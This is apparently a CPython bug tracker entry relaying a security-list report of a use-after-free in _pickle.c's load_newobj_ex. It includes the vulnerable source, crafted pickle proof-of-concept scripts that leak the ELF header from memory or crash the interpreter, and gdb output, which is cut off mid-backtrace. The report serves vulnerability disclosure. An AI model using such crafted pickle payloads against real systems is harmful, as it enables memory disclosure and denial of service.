New submission from Benjamin Peterson:
From Kurucsai Istvan on the security list:
I. Summary
There is a use-after-free in the load_newobj_ex function in _pickle.c that
results in an arbitrary read.
II. Source code
The functions in question:
static int
load_newobj_ex(UnpicklerObject *self)
{
PyObject *cls, *args, *kwargs;
PyObject *obj;
PickleState *st = _Pickle_GetGlobalState();
PDATA_POP(self->stack, kwargs);
if (kwargs == NULL) {
return -1;
}
PDATA_POP(self->stack, args);
if (args == NULL) {
Py_DECREF(kwargs);
return -1;
}
PDATA_POP(self->stack, cls);
if (cls == NULL) {
Py_DECREF(kwargs);
Py_DECREF(args);
return -1;
}
1. if (!PyType_Check(cls)) {
Py_DECREF(kwargs);
Py_DECREF(args);
2. Py_DECREF(cls);
PyErr_Format(st->UnpicklingError,
"NEWOBJ_EX class argument must be a type, not %.200s",
3. Py_TYPE(cls)->tp_name);
return -1;
}
1. This branch is taken if cls is not a type object.
2. Py_DECREF(cls) releases cls, so cls and its type object are freed.
3. Py_TYPE(cls)->tp_name is then read after the free; due to Python memory
management internals its value can be controlled, allowing arbitrary memory
addresses to be leaked in the exception text.
III. Proof of concept
The following PoC demonstrates the bug: it leaks the beginning of the ELF
header of the python binary using the following pickle:
0: F FLOAT -17.0
5: G BINFLOAT 4.850517136297445e-270
14: \x8a LONG1
-19433009197182618361932444855909718650799116435779157138706600511804357054621081254113158779140316034172772336611031765078550355689018943570873089549265771354179136777133140299700701757440
94: \x92 NEWOBJ_EX
95: . STOP
highest protocol among opcodes = 4
root@tukan-VirtualBox:/opt/cpython/cpython-d792dc240456-150629# cat
/opt/newobj_ex.py
import pickle
b = b'\x46\x2D\x31\x37\x0A\x47'
# read address, beginning of the ELF header of the python binary
b += b'\x08\x04\x80\x00'
b += b'\xE0\xFC\xBD\x8D\x8A\x4E\x00\x00\x00\x77\x55\x73\x41\xDE\x8D\xEA\x43\xDD\xB9\xDE\x10\xAE\x84\xAE\x15\x69\x3C\x9A\x34\x9C\x1B\x06\xE9\x68\x84\x5E\x3E\x74\x55\x55\x01\x5F\x65\x2E\x93\x83\x2D\x14\x36\x40\xA9\xEA\xAD\xFE\x77\x2D\x0F\x37\x8F\xE2\xFB\x18\xD6\x89\xDC\x75\x53\xB3\x15\xF1\x56\x17\x2F\x21\x78\x02\x7A\xBB\x95\x7B\x82\x40\x8A\xB8\x92.'
pickle.loads(b)
root@tukan-VirtualBox:/opt/cpython/cpython-d792dc240456-150629# file python
python: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically
linked (uses shared libs), for GNU/Linux 2.6.24,
BuildID[sha1]=e1a1b72a0e3093b61de9de9bb58b3ca031aeb9b6, not stripped
root@tukan-VirtualBox:/opt/cpython/cpython-d792dc240456-150629# ./python
Python 3.6.0a0 (default, Jun 29 2015, 22:03:19)
[GCC 4.8.2] on linux
Type "help", "copyright", "credits" or "license" for more information.
root@tukan-VirtualBox:/opt/cpython/cpython-d792dc240456-150629# ./python
/opt/newobj_ex.py
Traceback (most recent call last):
  File "/opt/newobj_ex.py", line 4, in <module>
    pickle.loads(b)
_pickle.UnpicklingError: NEWOBJ_EX class argument must be a type, not ELF
root@tukan-VirtualBox:/opt/cpython/cpython-d792dc240456-150629#
By changing the read address, a segfault can be triggered:
root@tukan-VirtualBox:/opt/cpython/cpython-d792dc240456-150629# cat
/opt/newobj_ex_crash.py
import pickle
b = b'\x46\x2D\x31\x37\x0A\x47'
# read address
b += b'\x41\x41\x41\x41'
b += b'\xE0\xFC\xBD\x8D\x8A\x4E\x00\x00\x00\x77\x55\x73\x41\xDE\x8D\xEA\x43\xDD\xB9\xDE\x10\xAE\x84\xAE\x15\x69\x3C\x9A\x34\x9C\x1B\x06\xE9\x68\x84\x5E\x3E\x74\x55\x55\x01\x5F\x65\x2E\x93\x83\x2D\x14\x36\x40\xA9\xEA\xAD\xFE\x77\x2D\x0F\x37\x8F\xE2\xFB\x18\xD6\x89\xDC\x75\x53\xB3\x15\xF1\x56\x17\x2F\x21\x78\x02\x7A\xBB\x95\x7B\x82\x40\x8A\xB8\x92.'
pickle.loads(b)
root@tukan-VirtualBox:/opt/cpython/cpython-d792dc240456-150629# gdb --silent
./python
Reading symbols from ./python...done.
(gdb) r /opt/newobj_ex_crash.py
Starting program: /opt/cpython/cpython-d792dc240456-150629/python
/opt/newobj_ex_crash.py
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/libthread_db.so.1".
Program received signal SIGSEGV, Segmentation fault.
0x081431dd in unicode_fromformat_write_cstr (writer=writer@entry=0xd11c,
str=0x41414141 <error: Cannot access memory at address 0x41414141>,
width=width@entry=-1, precision=precision@entry=200) at
Objects/unicodeobject.c:2368
2368        length = strlen(str);
(gdb) bt
#0 0x081431dd in unicode_fromformat_write_cstr
(writer=writer@entry=0xd11c, str=0x41414141 <error: Cannot access memory at
address 0x41414141>, width=width@entry=-1, precision=precision@entry=200) at
Objects/unicodeobject.c:2368
#1 0x08143a2a in unicode_fromformat_arg (writer=writer@entry=0xd11c,
f=0xf7b9f632 "s", f@entry=0xf7b9f62d "%.200s", vargs=vargs@entry=0xd118) at
Objects/unicodeobject.c:2583
#2 0x08144018 in PyUnicode_FromFormatV (format=<optimized out>,